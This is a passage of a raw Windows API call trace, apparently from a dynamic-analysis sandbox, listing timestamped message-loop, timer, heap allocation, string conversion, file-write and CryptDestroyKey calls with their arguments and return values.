lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0089.189] TranslateMessage (lpMsg=0x8cf708) returned 0 [0089.189] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0089.189] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0089.189] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0089.189] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.189] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.189] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.200] WriteFile (in: hFile=0x2c4, lpBuffer=0x3acf020*, nNumberOfBytesToWrite=0xf0b38, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3acf020*, lpNumberOfBytesWritten=0x8cf5e4*=0xf0b38, lpOverlapped=0x0) returned 1 [0089.381] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.381] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.381] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0089.381] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0089.381] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0089.381] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0089.381] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0089.381] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0089.381] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0089.381] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0089.381] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0089.381] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0089.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0089.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0089.382] CryptDestroyKey (hKey=0x9a4280) returned 1 [0089.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0089.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0089.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0089.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0089.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0089.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0089.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0089.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0089.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0089.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0089.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0089.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0089.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0089.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0089.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0089.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0089.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2ace888 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0089.383] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0089.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0089.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0089.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0089.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0089.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0089.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0089.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0089.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0089.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0089.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0089.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0089.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0089.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0089.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0089.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0089.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0089.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0089.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0089.384] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0089.384] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0089.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0089.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0089.384] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0089.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0089.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0089.384] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0089.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0089.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0089.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0089.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0089.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0089.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0089.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0089.385] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0089.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0089.385] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0089.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0089.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0089.385] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0089.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0089.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0089.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0089.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ff8 [0089.385] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0089.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0089.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0089.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0089.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0089.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0089.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0089.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0089.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0089.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0089.385] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0089.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0089.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0089.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0089.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0089.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0089.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0089.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0089.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0089.386] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0089.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0089.394] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0089.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0089.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0089.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0089.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0089.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0089.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0089.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0089.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0089.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0089.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0089.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0089.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0089.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0089.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0089.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0089.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0089.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0089.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0089.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74238 [0089.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0089.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0089.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c70 [0089.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0089.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e08 [0089.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e98 [0089.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0089.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0089.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0089.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0089.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0089.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0089.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0089.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0089.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0089.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0089.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 